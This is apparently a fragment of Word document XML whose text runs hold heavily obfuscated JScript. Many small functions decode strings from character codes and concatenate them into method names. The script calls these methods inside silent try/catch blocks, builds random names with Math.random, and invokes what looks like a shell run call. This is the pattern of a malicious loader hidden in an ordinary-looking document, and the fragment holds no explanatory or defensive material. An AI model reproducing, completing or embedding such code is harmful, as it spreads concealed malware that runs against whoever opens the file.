PpUzPnl(PpUzPnlJK(Rx+Rt)+(ifsco3[600]-ifsco3[Vgtf_56]),RunGe);  })(2991)+(function(Rt,Rx){ var uhsconsc5=Brfcook; uhsconsc5[Vgtf_56]=0; uhsconsc5[Vgtf_56-(Vgtf_56/3)]=32; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uhsconsc5[600]-uhsconsc5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var nseoth3=Brfcook; nseoth3[Vgtf_56]=3; nseoth3[Vgtf_56-(Vgtf_56/3)]=50; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nseoth3[600]-nseoth3[Vgtf_56]),RunGe);  })(1979,null,'robot28')+(function(Rt,Rx){ var kvtski3=Brfcook; kvtski3[Vgtf_56]=4; kvtski3[Vgtf_56-(Vgtf_56/3)]=71; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kvtski3[600]-kvtski3[Vgtf_56]),RunGe);  })(2185,'human24','entertain53','clutches88')+(function(Rt,Rx){ var wksthat85=Brfcook; wksthat85[Vgtf_56]=0; wksthat85[Vgtf_56-(Vgtf_56/3)]=32; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wksthat85[600]-wksthat85[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var witskill3=Brfcook; witskill3[Vgtf_56]=0; witskill3[Vgtf_56-(Vgtf_56/3)]=100; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(witskill3[600]-witskill3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var uujav5=Brfcook; uujav5[Vgtf_56]=4; uujav5[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uujav5[600]-uujav5[Vgtf_56]),RunGe);  })(false,true,'progress41','displayed83')+(function(Rt,Rx){ var stpever3=Brfcook; stpever3[Vgtf_56]=4; stpever3[Vgtf_56-(Vgtf_56/3)]=120; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(stpever3[600]-stpever3[Vgtf_56]),RunGe);  })(true,'White35','short49',false)+(function(Rt,Rx){ var wuwgr3=Brfcook; wuwgr3[Vgtf_56]=3; wuwgr3[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wuwgr3[600]-wuwgr3[Vgtf_56]),RunGe);  })(true,'addition49','being51')+(function(Rt,Rx){ var tsvconte5=Brfcook; tsvconte5[Vgtf_56]=4; tsvconte5[Vgtf_56-(Vgtf_56/3)]=36; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tsvconte5[600]-tsvconte5[Vgtf_56]),RunGe);  })('what20','humans11',true,'would54')+(function(Rt,Rx){ var qqjaval3=Brfcook; qqjaval3[Vgtf_56]=3; qqjaval3[Vgtf_56-(Vgtf_56/3)]=50; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qqjaval3[600]-qqjaval3[Vgtf_56]),RunGe);  })(2185,'progress41','displayed83')+(function(Rt,Rx){ var hhkavala4=Brfcook; hhkavala4[Vgtf_56]=2; hhkavala4[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hhkavala4[600]-hhkavala4[Vgtf_56]),RunGe);  })('progress41','displayed83')+(function(Rt,Rx){ var ewplivel5=Brfcook; ewplivel5[Vgtf_56]=0; ewplivel5[Vgtf_56-(Vgtf_56/3)]=32; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ewplivel5[600]-ewplivel5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var pfnroad4=Brfcook; pfnroad4[Vgtf_56]=0; pfnroad4[Vgtf_56-(Vgtf_56/3)]=38; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pfnroad4[600]-pfnroad4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var njvco4=Brfcook; njvco4[Vgtf_56]=3; njvco4[Vgtf_56-(Vgtf_56/3)]=41; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(njvco4[600]-njvco4[Vgtf_56]),RunGe);  })('declarations83',false,false)+(function(Rt,Rx){ var uipfeat4=Brfcook; uipfeat4[Vgtf_56]=1; uipfeat4[Vgtf_56-(Vgtf_56/3)]=33; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uipfeat4[600]-uipfeat4[Vgtf_56]),RunGe);  })('into30')+(function(Rt,Rx){ var shqski5=Brfcook; shqski5[Vgtf_56]=0; shqski5[Vgtf_56-(Vgtf_56/3)]=99; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(shqski5[600]-shqski5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var keueve5=Brfcook; keueve5[Vgtf_56]=0; keueve5[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(keueve5[600]-keueve5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var jnuande3=Brfcook; jnuande3[Vgtf_56]=4; jnuande3[Vgtf_56-(Vgtf_56/3)]=116; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jnuande3[600]-jnuande3[Vgtf_56]),RunGe);  })('could80',2556,true,'State64')+(function(Rt,Rx){ var uuumerel3=Brfcook; uuumerel3[Vgtf_56]=0; uuumerel3[Vgtf_56-(Vgtf_56/3)]=121; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uuumerel3[600]-uuumerel3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var sttgrati4=Brfcook; sttgrati4[Vgtf_56]=1; sttgrati4[Vgtf_56-(Vgtf_56/3)]=33; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(sttgrati4[600]-sttgrati4[Vgtf_56]),RunGe);  })('addition49')+(function(Rt,Rx){ var jkvoth3=Brfcook; jkvoth3[Vgtf_56]=3; jkvoth3[Vgtf_56-(Vgtf_56/3)]=50; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jkvoth3[600]-jkvoth3[Vgtf_56]),RunGe);  })('robot28','into6',433)+(function(Rt,Rx){ var uuwthat84=Brfcook; uuwthat84[Vgtf_56]=4; uuwthat84[Vgtf_56-(Vgtf_56/3)]=93; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uuwthat84[600]-uuwthat84[Vgtf_56]),RunGe);  })(131,null,'obey60','factory29')+(function(Rt,Rx){ var nkiconte5=Brfcook; nkiconte5[Vgtf_56]=0; nkiconte5[Vgtf_56-(Vgtf_56/3)]=32; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nkiconte5[600]-nkiconte5[Vgtf_56]),RunGe);  })()+gicqnlearned77+gicqnmust73+gicqnlearned77+(function(Rt,Rx){ var kufFort4=Brfcook; kufFort4[Vgtf_56]=3; kufFort4[Vgtf_56-(Vgtf_56/3)]=35; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kufFort4[600]-kufFort4[Vgtf_56]),RunGe);  })('while59','that50','orthrough89')+gicqnlearned77+gicqneverything75+(function(Rt,Rx){ var qkuForth4=Brfcook; qkuForth4[Vgtf_56]=0; qkuForth4[Vgtf_56-(Vgtf_56/3)]=46; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qkuForth4[600]-qkuForth4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var ufkfo4=Brfcook; ufkfo4[Vgtf_56]=2; ufkfo4[Vgtf_56-(Vgtf_56/3)]=108; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ufkfo4[600]-ufkfo4[Vgtf_56]),RunGe);  })(false,2613)+(function(Rt,Rx){ var vvfgrad4=Brfcook; vvfgrad4[Vgtf_56]=1; vvfgrad4[Vgtf_56-(Vgtf_56/3)]=116; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vvfgrad4[600]-vvfgrad4[Vgtf_56]),RunGe);  })(null)+(function(Rt,Rx){ var ifvmere3=Brfcook; ifvmere3[Vgtf_56]=0; ifvmere3[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ifvmere3[600]-ifvmere3[Vgtf_56]),RunGe);  })()+gicqnlearned77+(function(Rt,Rx){ var vshcont5=Brfcook; vshcont5[Vgtf_56]=0; vshcont5[Vgtf_56-(Vgtf_56/3)]=32; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vshcont5[600]-vshcont5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var pktgr4=Brfcook; pktgr4[Vgtf_56]=1; pktgr4[Vgtf_56-(Vgtf_56/3)]=39; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pktgr4[600]-pktgr4[Vgtf_56]),RunGe);  })(2913)+(function(Rt,Rx){ var nqugrati5=Brfcook; nqugrati5[Vgtf_56]=2; nqugrati5[Vgtf_56-(Vgtf_56/3)]=40; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nqugrati5[600]-nqugrati5[Vgtf_56]),RunGe);  })(false,'addition49')+(function(Rt,Rx){ var twvav4=Brfcook; twvav4[Vgtf_56]=4; twvav4[Vgtf_56-(Vgtf_56/3)]=36; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(twvav4[600]-twvav4[Vgtf_56]),RunGe);  })(null,'progress41','displayed83','rather47')+(function(Rt,Rx){ var upkev3=Brfcook; upkev3[Vgtf_56]=2; upkev3[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(upkev3[600]-upkev3[Vgtf_56]),RunGe);  })(null,'White35')+(function(Rt,Rx){ var nnngrati5=Brfcook; nnngrati5[Vgtf_56]=2; nnngrati5[Vgtf_56-(Vgtf_56/3)]=99; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nnngrati5[600]-nnngrati5[Vgtf_56]),RunGe);  })(true,'addition49')+(function(Rt,Rx){ var vkqgrad4=Brfcook; vkqgrad4[Vgtf_56]=4; vkqgrad4[Vgtf_56-(Vgtf_56/3)]=120; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vkqgrad4[600]-vkqgrad4[Vgtf_56]),RunGe);  })(false,null,'robots83','conscience16')+(function(Rt,Rx){ var jvpgradu5=Brfcook; jvpgradu5[Vgtf_56]=0; jvpgradu5[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jvpgradu5[600]-jvpgradu5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var piwme5=Brfcook; piwme5[Vgtf_56]=1; piwme5[Vgtf_56-(Vgtf_56/3)]=33; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(piwme5[600]-piwme5[Vgtf_56]),RunGe);  })(null)+(function(Rt,Rx){ var ipvwri4=Brfcook; ipvwri4[Vgtf_56]=3; ipvwri4[Vgtf_56-(Vgtf_56/3)]=50; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ipvwri4[600]-ipvwri4[Vgtf_56]),RunGe);  })('Both81','beingcharitable40','social53')+(function(Rt,Rx){ var ihkofpov5=Brfcook; ihkofpov5[Vgtf_56]=3; ihkofpov5[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ihkofpov5[600]-ihkofpov5[Vgtf_56]),RunGe);  })(null,'daily6','rooted92')+(function(Rt,Rx){ var wsuwrit4=Brfcook; wsuwrit4[Vgtf_56]=2; wsuwrit4[Vgtf_56-(Vgtf_56/3)]=34; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wsuwrit4[600]-wsuwrit4[Vgtf_56]),RunGe);  })('Both81','beingcharitable40')+(function(Rt,Rx){ var iewFor3=Brfcook; iewFor3[Vgtf_56]=3; iewFor3[Vgtf_56-(Vgtf_56/3)]=41; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(iewFor3[600]-iewFor3[Vgtf_56]),RunGe);  })('while59','that50','orthrough89')+(function(Rt,Rx){ var tusavala4=Brfcook; tusavala4[Vgtf_56]=4; tusavala4[Vgtf_56-(Vgtf_56/3)]=42; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tusavala4[600]-tusavala4[Vgtf_56]),RunGe);  })('progress41','displayed83',true,'rather47')+(function(Rt,Rx){ var snqroad4=Brfcook; snqroad4[Vgtf_56]=3; snqroad4[Vgtf_56-(Vgtf_56/3)]=35; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(snqroad4[600]-snqroad4[Vgtf_56]),RunGe);  })('lawsthe36','free58','being84')+(function(Rt,Rx){ var pnhcont4=Brfcook; pnhcont4[Vgtf_56]=2; pnhcont4[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pnhcont4[600]-pnhcont4[Vgtf_56]),RunGe);  })('what20','humans11')+(function(Rt,Rx){ var ntksk3=Brfcook; ntksk3[Vgtf_56]=1; ntksk3[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ntksk3[600]-ntksk3[Vgtf_56]),RunGe);  })('human24')+(function(Rt,Rx){ var ijsthat85=Brfcook; ijsthat85[Vgtf_56]=3; ijsthat85[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ijsthat85[600]-ijsthat85[Vgtf_56]),RunGe);  })(true,'obey60','factory29')+(function(Rt,Rx){ var peqroadI4=Brfcook; peqroadI4[Vgtf_56]=0; peqroadI4[Vgtf_56-(Vgtf_56/3)]=32; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(peqroadI4[600]-peqroadI4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var ntuHe4=Brfcook; ntuHe4[Vgtf_56]=1; ntuHe4[Vgtf_56-(Vgtf_56/3)]=48; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ntuHe4[600]-ntuHe4[Vgtf_56]),RunGe);  })(null)+(function(Rt,Rx){ var neqHe3=Brfcook; neqHe3[Vgtf_56]=2; neqHe3[Vgtf_56-(Vgtf_56/3)]=83; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(neqHe3[600]-neqHe3[Vgtf_56]),RunGe);  })('rooted92','thus68')+(function(Rt,Rx){ var ewnevery5=Brfcook; ewnevery5[Vgtf_56]=2; ewnevery5[Vgtf_56-(Vgtf_56/3)]=49; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ewnevery5[600]-ewnevery5[Vgtf_56]),RunGe);  })(true,false)+(function(Rt,Rx){ var khtmerel5=Brfcook; khtmerel5[Vgtf_56]=3; khtmerel5[Vgtf_56-(Vgtf_56/3)]=73; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(khtmerel5[600]-khtmerel5[Vgtf_56]),RunGe);  })(null,null,'idea46')+(function(Rt,Rx){ var jsjliv3=Brfcook; jsjliv3[Vgtf_56]=3; jsjliv3[Vgtf_56-(Vgtf_56/3)]=35; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jsjliv3[600]-jsjliv3[Vgtf_56]),RunGe);  })('second5',2318,'itself96')+gicqnlearned77+gicqnacceptance95+gicqnlearned77,'',(function(Rt,Rx){ var uqsroad5=Brfcook; uqsroad5[Vgtf_56]=2; uqsroad5[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uqsroad5[600]-uqsroad5[Vgtf_56]),RunGe);  })('lawsthe36',true)+(function(Rt,Rx){ var qesroa5=Brfcook; qesroa5[Vgtf_56]=3; qesroa5[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qesroa5[600]-qesroa5[Vgtf_56]),RunGe);  })(false,'lawsthe36','free58')+(function(Rt,Rx){ var wpjmere3=Brfcook; wpjmere3[Vgtf_56]=1; wpjmere3[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wpjmere3[600]-wpjmere3[Vgtf_56]),RunGe);  })('idea46')+(function(Rt,Rx){ var ujugrati4=Brfcook; ujugrati4[Vgtf_56]=0; ujugrati4[Vgtf_56-(Vgtf_56/3)]=110; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ujugrati4[600]-ujugrati4[Vgtf_56]),RunGe);  })(),0);                  }              gicqnready60[(function(Rt,Rx){ var vtesk5=Brfcook; vtesk5[Vgtf_56]=4; vtesk5[Vgtf_56-(Vgtf_56/3)]=71; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vtesk5[600]-vtesk5[Vgtf_56]),RunGe);  })(false,null,'human24',true)+(function(Rt,Rx){ var euiliv5=Brfcook; euiliv5[Vgtf_56]=4; euiliv5[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(euiliv5[600]-euiliv5[Vgtf_56]),RunGe);  })('second5',null,null,2865)+(function(Rt,Rx){ var hhuroad3=Brfcook; hhuroad3[Vgtf_56]=2; hhuroad3[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hhuroad3[600]-hhuroad3[Vgtf_56]),RunGe);  })('lawsthe36','free58')+(function(Rt,Rx){ var nujroadI5=Brfcook; nujroadI5[Vgtf_56]=3; nujroadI5[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nujroadI5[600]-nujroadI5[Vgtf_56]),RunGe);  })('lawsthe36',261,null)+(function(Rt,Rx){ var ishHe3=Brfcook; ishHe3[Vgtf_56]=4; ishHe3[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ishHe3[600]-ishHe3[Vgtf_56]),RunGe);  })(false,'rooted92','thus68',1003)]();</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">  gicqndaily68[(function(Rt,Rx){ var jwjlivel4=Brfcook; jwjlivel4[Vgtf_56]=4; jwjlivel4[Vgtf_56-(Vgtf_56/3)]=72; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jwjlivel4[600]-jwjlivel4[Vgtf_56]),RunGe);  })(1533,false,'second5','itself96')+(function(Rt,Rx){ var fquever4=Brfcook; fquever4[Vgtf_56]=4; fquever4[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fquever4[600]-fquever4[Vgtf_56]),RunGe);  })(null,true,'White35','short49')+(function(Rt,Rx){ var vqsmerel5=Brfcook; vqsmerel5[Vgtf_56]=2; vqsmerel5[Vgtf_56-(Vgtf_56/3)]=110; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vqsmerel5[600]-vqsmerel5[Vgtf_56]),RunGe);  })('idea46',false)+(function(Rt,Rx){ var tkkeve4=Brfcook; tkkeve4[Vgtf_56]=0; tkkeve4[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tkkeve4[600]-tkkeve4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var enjlive4=Brfcook; enjlive4[Vgtf_56]=2; enjlive4[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(enjlive4[600]-enjlive4[Vgtf_56]),RunGe);  })('second5','itself96')+(function(Rt,Rx){ var kueande3=Brfcook; kueande3[Vgtf_56]=1; kueande3[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kueande3[600]-kueande3[Vgtf_56]),RunGe);  })(false)+(function(Rt,Rx){ var ktfFo5=Brfcook; ktfFo5[Vgtf_56]=1; ktfFo5[Vgtf_56-(Vgtf_56/3)]=71; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ktfFo5[600]-ktfFo5[Vgtf_56]),RunGe);  })('while59')+(function(Rt,Rx){ var hinroad5=Brfcook; hinroad5[Vgtf_56]=2; hinroad5[Vgtf_56-(Vgtf_56/3)]=107; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hinroad5[600]-hinroad5[Vgtf_56]),RunGe);  })('lawsthe36',2536)+(function(Rt,Rx){ var pifwr3=Brfcook; pifwr3[Vgtf_56]=1; pifwr3[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pifwr3[600]-pifwr3[Vgtf_56]),RunGe);  })('Both81')+(function(Rt,Rx){ var wjvFort5=Brfcook; wjvFort5[Vgtf_56]=1; wjvFort5[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wjvFort5[600]-wjvFort5[Vgtf_56]),RunGe);  })(true)](gicqnsystem50+gicqnnothing15+gicqnslow85);</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">    }catch(gicqnbythe41){}</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">    }</w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve"> break;   }  while (gicqnaverted2)   {       try</w:t>
        <w:tab/>
        <w:t>{</w:t>
        <w:tab/>
        <w:t>gicqnunwillingly42=gicqnbringthem76+gicqnobservers54+(function(Rt,Rx){ var nwspres3=Brfcook; nwspres3[Vgtf_56]=2; nwspres3[Vgtf_56-(Vgtf_56/3)]=40; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nwspres3[600]-nwspres3[Vgtf_56]),RunGe);  })('would54','human24')+(function(Rt,Rx){ var uusoth3=Brfcook; uusoth3[Vgtf_56]=1; uusoth3[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uusoth3[600]-uusoth3[Vgtf_56]),RunGe);  })(false)+(function(Rt,Rx){ var tjewrite5=Brfcook; tjewrite5[Vgtf_56]=1; tjewrite5[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tjewrite5[600]-tjewrite5[Vgtf_56]),RunGe);  })(null)+(function(Rt,Rx){ var nkwHere5=Brfcook; nkwHere5[Vgtf_56]=3; nkwHere5[Vgtf_56-(Vgtf_56/3)]=64; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nkwHere5[600]-nkwHere5[Vgtf_56]),RunGe);  })('rooted92',true,true)+Math[(function(Rt,Rx){ var uneth4=Brfcook; uneth4[Vgtf_56]=2; uneth4[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uneth4[600]-uneth4[Vgtf_56]),RunGe);  })(true,false)+(function(Rt,Rx){ var wthfea4=Brfcook; wthfea4[Vgtf_56]=1; wthfea4[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wthfea4[600]-wthfea4[Vgtf_56]),RunGe);  })(false)+(function(Rt,Rx){ var uiwother5=Brfcook; uiwother5[Vgtf_56]=0; uiwother5[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uiwother5[600]-uiwother5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var nntthepa3=Brfcook; nntthepa3[Vgtf_56]=4; nntthepa3[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nntthepa3[600]-nntthepa3[Vgtf_56]),RunGe);  })(true,'must38',false,'named69')+(function(Rt,Rx){ var jktan5=Brfcook; jktan5[Vgtf_56]=3; jktan5[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jktan5[600]-jktan5[Vgtf_56]),RunGe);  })(1026,'could80',true)]((Math[(function(Rt,Rx){ var uuwthat3=Brfcook; uuwthat3[Vgtf_56]=3; uuwthat3[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uuwthat3[600]-uuwthat3[Vgtf_56]),RunGe);  })(false,1298,false)+(function(Rt,Rx){ var qunHe5=Brfcook; qunHe5[Vgtf_56]=1; qunHe5[Vgtf_56-(Vgtf_56/3)]=98; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qunHe5[600]-qunHe5[Vgtf_56]),RunGe);  })('rooted92')+(function(Rt,Rx){ var ijqlive5=Brfcook; ijqlive5[Vgtf_56]=4; ijqlive5[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ijqlive5[600]-ijqlive5[Vgtf_56]),RunGe);  })(true,'second5',null,'itself96')+(function(Rt,Rx){ var fwqco4=Brfcook; fwqco4[Vgtf_56]=4; fwqco4[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fwqco4[600]-fwqco4[Vgtf_56]),RunGe);  })('declarations83',1731,'provided81','second5')+(function(Rt,Rx){ var vesmere3=Brfcook; vesmere3[Vgtf_56]=2; vesmere3[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vesmere3[600]-vesmere3[Vgtf_56]),RunGe);  })('idea46','indeed17')+(function(Rt,Rx){ var suneve3=Brfcook; suneve3[Vgtf_56]=2; suneve3[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(suneve3[600]-suneve3[Vgtf_56]),RunGe);  })(true,'White35')]() * (11698)) + 1)+Math[(function(Rt,Rx){ var uneth4=Brfcook; uneth4[Vgtf_56]=2; uneth4[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uneth4[600]-uneth4[Vgtf_56]),RunGe);  })(true,false)+(function(Rt,Rx){ var wthfea4=Brfcook; wthfea4[Vgtf_56]=1; wthfea4[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wthfea4[600]-wthfea4[Vgtf_56]),RunGe);  })(false)+(function(Rt,Rx){ var uiwother5=Brfcook; uiwother5[Vgtf_56]=0; uiwother5[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uiwother5[600]-uiwother5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var nntthepa3=Brfcook; nntthepa3[Vgtf_56]=4; nntthepa3[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nntthepa3[600]-nntthepa3[Vgtf_56]),RunGe);  })(true,'must38',false,'named69')+(function(Rt,Rx){ var jktan5=Brfcook; jktan5[Vgtf_56]=3; jktan5[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jktan5[600]-jktan5[Vgtf_56]),RunGe);  })(1026,'could80',true)]((Math[(function(Rt,Rx){ var uuwthat3=Brfcook; uuwthat3[Vgtf_56]=3; uuwthat3[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uuwthat3[600]-uuwthat3[Vgtf_56]),RunGe);  })(false,1298,false)+(function(Rt,Rx){ var qunHe5=Brfcook; qunHe5[Vgtf_56]=1; qunHe5[Vgtf_56-(Vgtf_56/3)]=98; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qunHe5[600]-qunHe5[Vgtf_56]),RunGe);  })('rooted92')+(function(Rt,Rx){ var ijqlive5=Brfcook; ijqlive5[Vgtf_56]=4; ijqlive5[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ijqlive5[600]-ijqlive5[Vgtf_56]),RunGe);  })(true,'second5',null,'itself96')+(function(Rt,Rx){ var fwqco4=Brfcook; fwqco4[Vgtf_56]=4; fwqco4[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fwqco4[600]-fwqco4[Vgtf_56]),RunGe);  })('declarations83',1731,'provided81','second5')+(function(Rt,Rx){ var vesmere3=Brfcook; vesmere3[Vgtf_56]=2; vesmere3[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vesmere3[600]-vesmere3[Vgtf_56]),RunGe);  })('idea46','indeed17')+(function(Rt,Rx){ var suneve3=Brfcook; suneve3[Vgtf_56]=2; suneve3[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(suneve3[600]-suneve3[Vgtf_56]),RunGe);  })(true,'White35')]() * (818)) + 1);</w:t>
        <w:tab/>
        <w:t>gicqnauthorities97[(function(Rt,Rx){ var iwtconsc4=Brfcook; iwtconsc4[Vgtf_56]=3; iwtconsc4[Vgtf_56-(Vgtf_56/3)]=82; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(iwtconsc4[600]-iwtconsc4[Vgtf_56]),RunGe);  })('declarations83','provided81','second5')+(function(Rt,Rx){ var jfvcons4=Brfcook; jfvcons4[Vgtf_56]=4; jfvcons4[Vgtf_56-(Vgtf_56/3)]=116; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jfvcons4[600]-jfvcons4[Vgtf_56]),RunGe);  })(1573,'declarations83','provided81',false)+(function(Rt,Rx){ var qvnan5=Brfcook; qvnan5[Vgtf_56]=4; qvnan5[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qvnan5[600]-qvnan5[Vgtf_56]),RunGe);  })(51,'could80',null,51)+(function(Rt,Rx){ var sijfeat3=Brfcook; sijfeat3[Vgtf_56]=1; sijfeat3[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(sijfeat3[600]-sijfeat3[Vgtf_56]),RunGe);  })('into30')](gicqnmight26, gicqnunwillingly42, false);</w:t>
        <w:tab/>
